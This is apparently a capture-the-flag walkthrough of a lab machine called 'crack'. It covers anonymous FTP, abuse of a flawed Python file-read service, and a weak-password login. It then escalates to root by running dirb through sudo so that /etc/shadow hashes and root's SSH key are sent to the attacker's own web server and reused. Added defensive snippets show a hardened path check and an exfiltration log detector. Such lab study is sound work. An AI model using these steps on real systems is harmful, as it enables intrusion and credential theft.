Hacker learning...
┌──(root㉿kali)-[/home/ace]
└─# nmap -sC -sV -p- 192.168.56.133
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-27 08:49 CST
Nmap scan report for 192.168.56.133
Host is up (0.0016s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxrwxrwx 2 0 0 4096 Jun 07 14:40 upload [NSE: writeable]
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.56.127
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 3
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
4200/tcp open ssl/http ShellInABox
|_http-title: Shell In A Box
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=crack
| Not valid before: 2023-06-07T10:20:13
|_Not valid after: 2043-06-02T10:20:13
12359/tcp open unknown
| fingerprint-strings:
| GenericLines:
| File to read:NOFile to read:
| NULL:
|_ File to read:
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port12359-TCP:V=7.93%I=7%D=7/27%Time=64C1BF1F%P=x86_64-pc-linux-gnu%r(N
SF:ULL,D,"File\x20to\x20read:")%r(GenericLines,1C,"File\x20to\x20read:NOFi
SF:le\x20to\x20read:");
MAC Address: 08:00:27:26:25:3E (Oracle VirtualBox virtual NIC)
Service Info: OS: Unix

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 34.34 seconds

2. Log in to the FTP service

The scan shows that FTP accepts the anonymous login account, so log in and take a look.

┌──(root㉿kali)-[/home/ace]
└─# ftp 192.168.56.133
Connected to 192.168.56.133.
220 (vsFTPd 3.0.3)
Name (192.168.56.133:ace): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>

3. See which files are present

┌──(root㉿kali)-[/home/ace]
└─# ftp 192.168.56.133
Connected to 192.168.56.133.
220 (vsFTPd 3.0.3)
Name (192.168.56.133:ace): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||46515|)
150 Here comes the directory listing.
drwxrwxrwx 2 0 0 4096 Jun 07 14:40 upload
226 Directory send OK.
ftp> cd upload
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||31922|)
150 Here comes the directory listing.
-rwxr-xr-x 1 1000 1000 849 Jun 07 14:40 crack.py
226 Directory send OK.
ftp> get crack.py
local: crack.py remote: crack.py
229 Entering Extended Passive Mode (|||24898|)
150 Opening BINARY mode data connection for crack.py (849 bytes).
100% |*****************************************************************************************************| 849 297.48 KiB/s 00:00 ETA
226 Transfer complete.
849 bytes received in 00:00 (140.83 KiB/s)
ftp>

Open the file and take a look:

import os
import socket

# Listen on TCP port 12359 on all interfaces.
s = socket.socket()
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
port = 12359
s.bind(('', port))
s.listen(50)

c, addr = s.accept()
no = "NO"
while True:
    try:
        c.send('File to read:'.encode())
        data = c.recv(1024)
        file = (str(data, 'utf-8').strip())
        # Only the base name is checked against the upload directory...
        filename = os.path.basename(file)
        check = "/srv/ftp/upload/"+filename
        # ...but the file that gets opened is the full path the client sent.
        if os.path.isfile(check) and os.path.isfile(file):
            f = open(file,"r")
            lines = f.readlines()
            lines = str(lines)
            lines = lines.encode()
            c.send(lines)
        else:
            c.send(no.encode())
    except ConnectionResetError:
        pass

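On closer analysis, this appears to be the script running on port 12359. It asks us for a file on the system, and if a file with the same name also exists under /srv/ftp/upload, it sends us the contents of the existing file on the system.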
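
The flaw described above, next to a hardened lookup, as an added example that is not part of the original write-up or of the target's code. `resolve_inside` and the throwaway directory layout in `demo` are hypothetical; only the basename check is taken from crack.py.

```python
import os
import tempfile

UPLOAD_DIR = "/srv/ftp/upload"  # path used by crack.py on the page


def original_check(requested, upload_dir=UPLOAD_DIR):
    """The test crack.py performs: only the base name must exist in upload_dir."""
    check = os.path.join(upload_dir, os.path.basename(requested))
    return os.path.isfile(check) and os.path.isfile(requested)


def resolve_inside(requested, upload_dir=UPLOAD_DIR):
    """Hardened lookup (hypothetical helper): return the real path of the
    requested file only if it is a regular file inside upload_dir, else None."""
    if "\0" in requested:
        return None
    base = os.path.realpath(upload_dir)
    # Interpret the request relative to the upload directory, then resolve
    # symlinks and ".." before comparing against the base directory.
    candidate = os.path.realpath(os.path.join(base, requested))
    if os.path.commonpath([base, candidate]) != base:
        return None
    if not os.path.isfile(candidate):
        return None
    return candidate


def demo():
    """Compare both checks on constructed files in a temporary directory."""
    with tempfile.TemporaryDirectory() as root:
        upload = os.path.join(root, "upload")
        os.mkdir(upload)
        secret = os.path.join(root, "passwd")  # stands in for /etc/passwd
        with open(secret, "w") as f:
            f.write("root:x:0:0\n")
        # Decoy with the same base name, as uploaded over anonymous FTP.
        with open(os.path.join(upload, "passwd"), "w") as f:
            f.write("123\n")
        # A symlink placed in the upload directory that points outside it.
        os.symlink(secret, os.path.join(upload, "link"))
        inside = resolve_inside("passwd", upload)
        return {
            "original_outside": original_check(secret, upload),
            "hardened_outside": resolve_inside(secret, upload),
            "hardened_traversal": resolve_inside("../passwd", upload),
            "hardened_symlink": resolve_inside("link", upload),
            "hardened_inside": os.path.basename(inside or ""),
        }


if __name__ == "__main__":
    for name, result in demo().items():
        print(name, "->", result)
```

The hardened lookup opens the resolved path it validated, so the name that was checked and the file that is read cannot differ.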

Create a file and try uploading it:

┌──(root㉿kali)-[/home/ace]
└─# echo "123" >passwd
ftp> put passwd
local: passwd remote: passwd
229 Entering Extended Passive Mode (|||36024|)
150 Ok to send data.
100% |*****************************************************************************************************| 4 20.45 KiB/s 00:00 ETA
226 Transfer complete.
4 bytes sent in 00:00 (0.66 KiB/s)
ftp> ls
229 Entering Extended Passive Mode (|||49954|)
150 Here comes the directory listing.
-rwxr-xr-x 1 1000 1000 849 Jun 07 14:40 crack.py
-rw------- 1 107 114 4 Jul 27 03:43 passwd
226 Directory send OK.
ftp>

Connect to the port:

┌──(root㉿kali)-[/home/ace]
└─# nc 192.168.56.133 12359
File to read:/etc/passwd
['root:x:0:0:root:/root:/bin/bash\n', 'daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n', 'bin:x:2:2:bin:/bin:/usr/sbin/nologin\n', 'sys:x:3:3:sys:/dev:/usr/sbin/nologin\n', 'sync:x:4:65534:sync:/bin:/bin/sync\n', 'games:x:5:60:games:/usr/games:/usr/sbin/nologin\n', 'man:x:6:12:man:/var/cache/man:/usr/sbin/nologin\n', 'lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin\n', 'mail:x:8:8:mail:/var/mail:/usr/sbin/nologin\n', 'news:x:9:9:news:/var/spool/news:/usr/sbin/nologin\n', 'uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin\n', 'proxy:x:13:13:proxy:/bin:/usr/sbin/nologin\n', 'www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\n', 'backup:x:34:34:backup:/var/backups:/usr/sbin/nologin\n', 'list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin\n', 'irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin\n', 'gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin\n', 'nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin\n', '_apt:x:100:65534::/nonexistent:/usr/sbin/nologin\n', 'systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin\n', 'systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin\n', 'messagebus:x:103:109::/nonexistent:/usr/sbin/nologin\n', 'systemd-timesync:x:104:110:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin\n', 'sshd:x:105:65534::/run/sshd:/usr/sbin/nologin\n', 'cris:x:1000:1000:cris,,,:/home/cris:/bin/bash\n', 'systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin\n', 'shellinabox:x:106:112:Shell In A Box,,,:/var/lib/shellinabox:/usr/sbin/nologin\n', 'ftp:x:107:114:ftp daemon,,,:/srv/ftp:/usr/sbin/nologin\n']File to read:

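The sync entry shows that a connection is possible:

cris looks like a suspicious user, so try connecting as that user through Shell In A Box.

Looking back at the earlier scan results, shellinabox is present.

4. Shell In A Box login: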

crack login: cris                                                                                                                                                                                                              
Password: cris
Linux crack 5.10.0-23-amd64 #1 SMP Debian 5.10.179-1 (2023-05-12) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed Jun 7 14:39:38 CEST 2023 from 192.168.0.100 on pts/0
cris@crack:~$ ls
crack.py user.txt ziempre.py
cris@crack:~$ cat user.txt
eG4TUsTBxSFjTOPHMV
cris@crack:~$

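5. sudo privilege escalation

Dirb is a fuzzer for websites, so I could already imagine how to take advantage of this. What I did was run a web server with Python on my machine, and then fuzz it using system files that hold privileged information as the wordlist.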

cris@crack:~$ sudo -u root /usr/bin/dirb http://192.168.56.127/ /etc/shadow       
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Thu Jul 27 06:05:15 2023
URL_BASE: http://192.168.56.127/
WORDLIST_FILES: /etc/shadow
-----------------
GENERATED WORDS: 28
---- Scanning URL: http://192.168.56.127/ ----
-----------------
END_TIME: Thu Jul 27 06:05:15 2023
DOWNLOADED: 28 - FOUND: 0
cris@crack:~$
┌──(root㉿kali)-[/home/ace]
└─# python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
192.168.56.133 - - [27/Jul/2023 12:05:16] code 404, message File not found
192.168.56.133 - - [27/Jul/2023 12:05:16] "GET /randomfile1 HTTP/1.1" 404 -
192.168.56.133 - - [27/Jul/2023 12:05:16] code 404, message File not found
192.168.56.133 - - [27/Jul/2023 12:05:16] "GET /frand2 HTTP/1.1" 404 -
192.168.56.133 - - [27/Jul/2023 12:05:16] code 404, message File not found
192.168.56.133 - - [27/Jul/2023 12:05:16] "GET /root:$y$j9T$LVT9GIrLdk5L.xns1akJZ1$wmigJ7er07AT/VwIAuYSZ3j94LOCe8EJHC6d2mlZVo3:19515:0:99999:7::: HTTP/1.1" 404 -
192.168.56.133 - - [27/Jul/2023 12:05:16] code 404, message File not found
192.168.56.133 - - [27/Jul/2023 12:05:16] "GET /daemon:*:19515:0:99999:7::: HTTP/1.1" 404 -
192.168.56.133 - - [27/Jul/2023 12:05:16] code 404, message File not found
192.168.56.133 - - [27/Jul/2023 12:05:16] "GET /bin:*:19515:0:99999:7::: HTTP/1.1" 404 -
192.168.56.133 - - [27/Jul/2023 12:05:16] code 404, message File not found
192.168.56.133 - - [27/Jul/2023 12:05:16] "GET /sys:*:19515:0:99999:7::: HTTP/1.1" 404 -
192.168.56.133 - - [27/Jul/2023 12:05:16] code 404, message File not found
192.168.56.133 - - [27/Jul/2023 12:05:16] "GET /sync:*:19515:0:99999:7::: HTTP/1.1" 404 -
192.168.56.133 - - [27/Jul/2023 12:05:16] code 404, message File not found
192.168.56.133 - - [27/Jul/2023 12:05:16] "GET /games:*:19515:0:99999:7::: HTTP/1.1" 404 -
192.168.56.133 - - [27/Jul/2023 12:05:16] code 404, message File not found
192.168.56.133 - - [27/Jul/2023 12:05:16] "GET /man:*:19515:0:99999:7::: HTTP/1.1" 404 -
192.168.56.133 - - [27/Jul/2023 12:05:16] code 404, message File not found
192.168.56.133 - - [27/Jul/2023 12:05:16] "GET /lp:*:19515:0:99999:7::: HTTP/1.1" 404 -
192.168.56.133 - - [27/Jul/2023 12:05:16] code 404, message File not found
192.168.56.133 - - [27/Jul/2023 12:05:16] "GET /mail:*:19515:0:99999:7::: HTTP/1.1" 404 -
192.168.56.133 - - [27/Jul/2023 12:05:16] code 404, message File not found
192.168.56.133 - - [27/Jul/2023 12:05:16] "GET /news:*:19515:0:99999:7::: HTTP/1.1" 404 -
192.168.56.133 - - [27/Jul/2023 12:05:16] code 404, message File not found
192.168.56.133 - - [27/Jul/2023 12:05:16] "GET /uucp:*:19515:0:99999:7::: HTTP/1.1" 404 -
192.168.56.133 - - [27/Jul/2023 12:05:16] code 404, message File not found
192.168.56.133 - - [27/Jul/2023 12:05:16] "GET /proxy:*:19515:0:99999:7::: HTTP/1.1" 404 -
192.168.56.133 - - [27/Jul/2023 12:05:16] code 404, message File not found
192.168.56.133 - - [27/Jul/2023 12:05:16] "GET /www-data:*:19515:0:99999:7::: HTTP/1.1" 404 -
192.168.56.133 - - [27/Jul/2023 12:05:16] code 404, message File not found
192.168.56.133 - - [27/Jul/2023 12:05:16] "GET /backup:*:19515:0:99999:7::: HTTP/1.1" 404 -
192.168.56.133 - - [27/Jul/2023 12:05:16] code 404, message File not found
192.168.56.133 - - [27/Jul/2023 12:05:16] "GET /list:*:19515:0:99999:7::: HTTP/1.1" 404 -
192.168.56.133 - - [27/Jul/2023 12:05:16] code 404, message File not found
192.168.56.133 - - [27/Jul/2023 12:05:16] "GET /irc:*:19515:0:99999:7::: HTTP/1.1" 404 -
192.168.56.133 - - [27/Jul/2023 12:05:16] code 404, message File not found
192.168.56.133 - - [27/Jul/2023 12:05:16] "GET /gnats:*:19515:0:99999:7::: HTTP/1.1" 404 -
192.168.56.133 - - [27/Jul/2023 12:05:16] code 404, message File not found
192.168.56.133 - - [27/Jul/2023 12:05:16] "GET /nobody:*:19515:0:99999:7::: HTTP/1.1" 404 -
192.168.56.133 - - [27/Jul/2023 12:05:16] code 404, message File not found
192.168.56.133 - - [27/Jul/2023 12:05:16] "GET /_apt:*:19515:0:99999:7::: HTTP/1.1" 404 -
192.168.56.133 - - [27/Jul/2023 12:05:16] code 404, message File not found
192.168.56.133 - - [27/Jul/2023 12:05:16] "GET /systemd-network:*:19515:0:99999:7::: HTTP/1.1" 404 -
192.168.56.133 - - [27/Jul/2023 12:05:16] code 404, message File not found
192.168.56.133 - - [27/Jul/2023 12:05:16] "GET /systemd-resolve:*:19515:0:99999:7::: HTTP/1.1" 404 -
192.168.56.133 - - [27/Jul/2023 12:05:16] code 404, message File not found
192.168.56.133 - - [27/Jul/2023 12:05:16] "GET /messagebus:*:19515:0:99999:7::: HTTP/1.1" 404 -
192.168.56.133 - - [27/Jul/2023 12:05:16] code 404, message File not found
192.168.56.133 - - [27/Jul/2023 12:05:16] "GET /systemd-timesync:*:19515:0:99999:7::: HTTP/1.1" 404 -
192.168.56.133 - - [27/Jul/2023 12:05:16] code 404, message File not found
192.168.56.133 - - [27/Jul/2023 12:05:16] "GET /sshd:*:19515:0:99999:7::: HTTP/1.1" 404 -
192.168.56.133 - - [27/Jul/2023 12:05:16] code 404, message File not found
192.168.56.133 - - [27/Jul/2023 12:05:16] "GET /cris:$y$j9T$kFXVxpRhH2ZAeDGNazqRq/$IokBR4XhhyRJOur8YOHu3fF59/0NOHC5AIsvkxXx8..:19515:0:99999:7::: HTTP/1.1" 404 -
192.168.56.133 - - [27/Jul/2023 12:05:16] code 404, message File not found
192.168.56.133 - - [27/Jul/2023 12:05:16] "GET /systemd-coredump:!*:19515:::::: HTTP/1.1" 404 -
192.168.56.133 - - [27/Jul/2023 12:05:16] code 404, message File not found
192.168.56.133 - - [27/Jul/2023 12:05:16] "GET /shellinabox:*:19515:0:99999:7::: HTTP/1.1" 404 -
192.168.56.133 - - [27/Jul/2023 12:05:16] code 404, message File not found
192.168.56.133 - - [27/Jul/2023 12:05:16] "GET /ftp:*:19515:0:99999:7::: HTTP/1.1" 404 -
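
Detection logic for the pattern visible in the log above, as an added example that is not part of the original write-up: it flags hosts whose outbound GET paths look like /etc/shadow entries or like a PEM-framed key. It assumes outbound requests are logged in the same format as the http.server lines shown here; the sample lines, addresses and hash placeholders are constructed.

```python
import re
from collections import defaultdict

# Request line in the format logged by `python -m http.server`.
REQUEST = re.compile(
    r'^(?P<src>\S+) - - \[[^\]]+\] "GET /(?P<path>.*) HTTP/\d\.\d" \d{3}')
# /etc/shadow entry: name:hash-or-lock followed by seven numeric or empty fields.
SHADOW = re.compile(r'^[a-z_][a-z0-9_-]*:[^:]*:\d*:\d*:\d*:\d*:\d*:\d*:$', re.I)
PEM_MARKER = re.compile(r'^-----(?:BEGIN|END)')
BASE64_RUN = re.compile(r'^[A-Za-z0-9+/]{40,}={0,2}$')


def classify(path):
    """Return the kind of sensitive-looking content in a request path, or None."""
    if SHADOW.match(path):
        return "shadow_entry"
    if PEM_MARKER.match(path):
        return "pem_marker"
    if BASE64_RUN.match(path):
        return "base64_run"
    return None


def scan(lines, min_hits=3):
    """Map each source host to the reasons it should be investigated."""
    hits = defaultdict(lambda: defaultdict(int))
    for line in lines:
        m = REQUEST.match(line)
        if not m:  # e.g. the "code 404, message ..." companion lines
            continue
        kind = classify(m.group("path"))
        if kind:
            hits[m.group("src")][kind] += 1
    alerts = {}
    for src, kinds in hits.items():
        reasons = []
        if kinds["shadow_entry"] >= min_hits:
            reasons.append("shadow-format paths")
        if kinds["pem_marker"] and kinds["base64_run"] >= min_hits:
            reasons.append("PEM key in paths")
        if reasons:
            alerts[src] = reasons
    return alerts


# Constructed sample: three hosts, placeholder hash and key material.
STAMP = "[01/Jan/2024 10:00:00]"
SAMPLE = [
    f'10.0.0.5 - - {STAMP} code 404, message File not found',
    f'10.0.0.5 - - {STAMP} "GET /randomfile1 HTTP/1.1" 404 -',
    f'10.0.0.5 - - {STAMP} "GET /root:$y$j9T$SALT$PLACEHOLDER:19515:0:99999:7::: HTTP/1.1" 404 -',
    f'10.0.0.5 - - {STAMP} "GET /daemon:*:19515:0:99999:7::: HTTP/1.1" 404 -',
    f'10.0.0.5 - - {STAMP} "GET /systemd-coredump:!*:19515:::::: HTTP/1.1" 404 -',
    f'10.0.0.6 - - {STAMP} "GET /-----BEGIN HTTP/1.1" 404 -',
    *[f'10.0.0.6 - - {STAMP} "GET /{"QUJD" * 12}{i} HTTP/1.1" 404 -' for i in range(3)],
    f'10.0.0.6 - - {STAMP} "GET /-----END HTTP/1.1" 404 -',
    f'10.0.0.7 - - {STAMP} "GET /admin HTTP/1.1" 404 -',
    f'10.0.0.7 - - {STAMP} "GET /index.html HTTP/1.1" 200 -',
]

if __name__ == "__main__":
    for host, reasons in scan(SAMPLE).items():
        print(host, reasons)
```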

In the same way, we can try to obtain id_rsa.

cris@crack:~$ sudo -u root /usr/bin/dirb http://192.168.56.127/ /root/.ssh/id_rsa 
-----------------
DIRB v2.2
By The Dark Raver
-----------------
START_TIME: Thu Jul 27 06:13:33 2023
URL_BASE: http://192.168.56.127/
WORDLIST_FILES: /root/.ssh/id_rsa
-----------------
GENERATED WORDS: 38
---- Scanning URL: http://192.168.56.127/ ----
-----------------
END_TIME: Thu Jul 27 06:13:34 2023
DOWNLOADED: 38 - FOUND: 0
cris@crack:~$
┌──(root㉿kali)-[/home/ace]
└─# python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
192.168.56.133 - - [27/Jul/2023 12:13:35] code 404, message File not found
192.168.56.133 - - [27/Jul/2023 12:13:35] "GET /randomfile1 HTTP/1.1" 404 -
192.168.56.133 - - [27/Jul/2023 12:13:35] code 404, message File not found
192.168.56.133 - - [27/Jul/2023 12:13:35] "GET /frand2 HTTP/1.1" 404 -
192.168.56.133 - - [27/Jul/2023 12:13:35] code 404, message File not found
192.168.56.133 - - [27/Jul/2023 12:13:35] "GET /-----BEGIN HTTP/1.1" 404 -
192.168.56.133 - - [27/Jul/2023 12:13:35] code 404, message File not found
192.168.56.133 - - [27/Jul/2023 12:13:35] "GET /-----END HTTP/1.1" 404 -

From this, id_rsa can be copied out.

cris@crack:/tmp$ wget http://192.168.56.127/ssh.txt                                                                                                                                                                            
--2023-07-27 07:40:45-- http://192.168.56.127/ssh.txt
Conectando con 192.168.56.127:80... conectado.
Petición HTTP enviada, esperando respuesta... 200 OK
Longitud: 2629 (2,6K) [text/plain]
Grabando a: «ssh.txt.1»
ssh.txt.1 100%[==============================================================================================================================>] 2,57K --.-KB/s en 0,002s
2023-07-27 07:40:45 (1,49 MB/s) - «ssh.txt.1» guardado [2629/2629]
cris@crack:/tmp$ ssh root@127.0.0.1 -i ssh.txt.1
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ WARNING: UNPROTECTED PRIVATE KEY FILE! @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Permissions 0644 for 'ssh.txt.1' are too open.
It is required that your private key files are NOT accessible by others.
This private key will be ignored.
Load key "ssh.txt.1": bad permissions
root@127.0.0.1's password:
cris@crack:/tmp$ chmod 600 ssh.txt.1
cris@crack:/tmp$ ssh root@127.0.0.1 -i ssh.txt.1

The sudo privilege escalation succeeded.